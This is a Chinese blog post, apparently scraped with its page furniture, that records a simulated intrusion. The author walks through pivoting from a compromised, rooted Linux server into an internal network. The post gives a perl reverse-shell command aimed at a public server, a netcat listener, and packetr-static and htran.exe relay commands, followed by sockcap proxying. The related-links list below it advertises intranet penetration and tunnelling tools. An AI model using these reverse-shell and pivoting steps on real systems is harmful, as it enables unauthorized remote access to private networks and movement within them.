`
blogfeifei
  • 浏览: 1206617 次
文章分类
社区版块
存档分类
最新评论

Linux下的内网反弹实例

 
阅读更多

遇到一个案例,细节不表,把在案例中的操作方法在本机模拟了下,记录之.

环境:

被攻陷的Linux主机(拿到root权限)-----模拟为我内网的一台Linux服务器 192.168.0.105

hack的操作用机-----我的电脑 192.168.1.101

反弹到公网的服务器-----我自己的公网服务器 61.160.2xx.xxx

渗透测试用的windows测试机 192.168.1.109

工具:

packetr-static Linux下的

htran.exe windows下的

sockcap 用作代理进入内网渗透的利器

过程:

1.我模拟下极度苛刻的情况下的环境,该攻陷的Linux服务器对外不开放22,只存在web端口80,那么我们必须得反弹shell到公网的机器上,这点我虚拟机里面没 这个环境,我就直接说下简要的

上传back.pl文件到linux下的tmp目录下,执行

perl /tmp/back.pl xxx.xxx.xxx.xxx 端口

在公网的服务器上,运行nc执行

nc -l -v -p 端口(跟上面的一样)

现在我弹2个窗口回来,一个开代理,一个转发数据

把packetr-static传上去,执行

./packetr-static -s 1988

一个窗口转发数据,执行

./packetr-static -slave 61.160.20x.xxx 123 127.0.0.1 1988

2.在windows公网端执行,

htran.exe -p -listen 123 1988

3.配置sockcap

4.运行代理程序进入内网

分享到:
评论

相关推荐

    Linux下的内网反弹实例.txt

    Linux系统安全学习

    Linux内网环境,离线安装gcc

    Linux是内网环境不支持lsof命令,那就离线安装gcc 将这些rmp传到linux服务器下,统一安装即可: rpm -Uvh *.rpm --nodeps --force

    linux下搭建内网maven私服

    Linux 下搭建内网 Maven 私服 Maven 私服是 Maven 仓库的私有化版本,允许开发者在企业内部搭建私有的 Maven 仓库,用于存储和管理项目依赖项。在 Linux 环境下搭建内网 Maven 私服,可以提高项目的构建和部署效率...

    linux 搭建内网NTP服务器

    下面将详细介绍如何在Linux内网环境中搭建NTP服务器。 首先,我们需要了解NTP的工作原理。NTP通过与互联网上的公共NTP服务器或其他已知准确的时间源进行通信,来校准本地系统时钟。它利用UDP协议在端口123上进行...

    linux内网穿透版本

    linux内网穿透版本

    linux-内网开发环境域名代理服务

    "Linux-内网开发环境域名代理服务"这个主题涉及到的是如何在Linux系统内为开发环境设置一个域名代理服务,以便在本地进行高效且便捷的开发工作。这通常包括配置和管理网络代理、DNS解析以及开发环境的隔离等技术。在...

    linux 下简易smtp内网邮件服务器

    念书的时候写的一个 linux 下的smtp 内网邮件服务器.能够接收outlook 邮件

    linux实现内网穿透

    linux实现内网穿透 本文参考 https://segmentfault.com/a/1190000020293986 准备两台机器 内网机: 192.168.0.154 (公司电脑) 外网机: 1.1.1.1 (阿里服务器,出于安全性考虑这里展示的是虚拟地址,换成自己的外网...

    POWERSHELL_内网渗透实例.pdf

    目录 1.POWERSHELL简介 2.POWERSPLOIT 3.内网渗透实例

    linux内网渗透1

    本文主要涉及的是Linux内网渗透的相关技术与步骤,主要分为以下几个部分: 1. **漏洞利用**: 提到了Wooyun上的一个漏洞(wooyun-2015-0144595),这个漏洞是针对Glassfish应用服务器的。攻击者通过该漏洞可以读取...

    linux内网安装Nginx依赖包

    在Linux环境中,特别是对于内网环境,安装Nginx服务器时可能会遇到因网络限制无法自动获取和安装依赖的问题。在这种情况下,预先准备好的Nginx依赖包就显得尤为重要。本主题将详细介绍如何在CentOS7系统下,通过提供...

    Linux下基于路由策略的IP地址控制实例

    Linux 下基于路由策略的 IP 地址控制实例 在 Linux 系统中,基于路由策略的 IP 地址控制实例是一个非常重要的知识点。本文将详细介绍如何使用路由策略来控制 IP 地址,以满足不同的网络需求。 一、背景描述 在 ...

    解决linux内网时间不同步问题

    在Linux系统中,保持内网中的时间同步是至关重要的,特别是在多台服务器或者设备需要协同工作的环境中。时间不一致可能导致数据一致性问题、日志记录混乱以及其他各种操作问题。本篇文章将详细探讨如何解决Linux内网...

    frp内网穿透工具,包含linux和windows

    frp内网穿透工具,包含linux和windows

    linux下wookteam内网环境搭建教程及环境依赖包

    wookteam内网环境搭建 含教程 含环境包 含依赖包 有了此包,从0到搭建完成wookteam。无需再找资源

    Linux内网渗透.doc

    本文将从拿到一个 Linux shell 开始,介绍 Linux 内网渗透技术,分为容器逃逸、Linux 提权、Linux 信息收集、Linux 隧道技术、Linux 横向移动、Linux 权限维持、Linux 痕迹清理几个部分。 一、容器逃逸 容器逃逸是...

    钉钉内网穿透工具Linux版

    新建一个start.sh 文件 放入内容./ding -config=ding.cfg -subdomain=xxx 18989 & ,xxx是你要设置的域名名称,18989是要映射的端口号改成你自己的,chmod +x start.sh 赋予启动权限,然后启动 ,ok完工

    Linux下局域网邮件服务器的建立

    Linux下局域网邮件服务器的建立.pdf

    linux 内网离线的nginx 安装

    linux 内网离线的nginx 安装linux 内网离线的nginx 安装linux 内网离线的nginx 安装

    Linux内网搭建svn所有依赖包及教程

    要在内网linux环境下搭建svn服务,查了很多资料,分享一下

Global site tag (gtag.js) - Google Analytics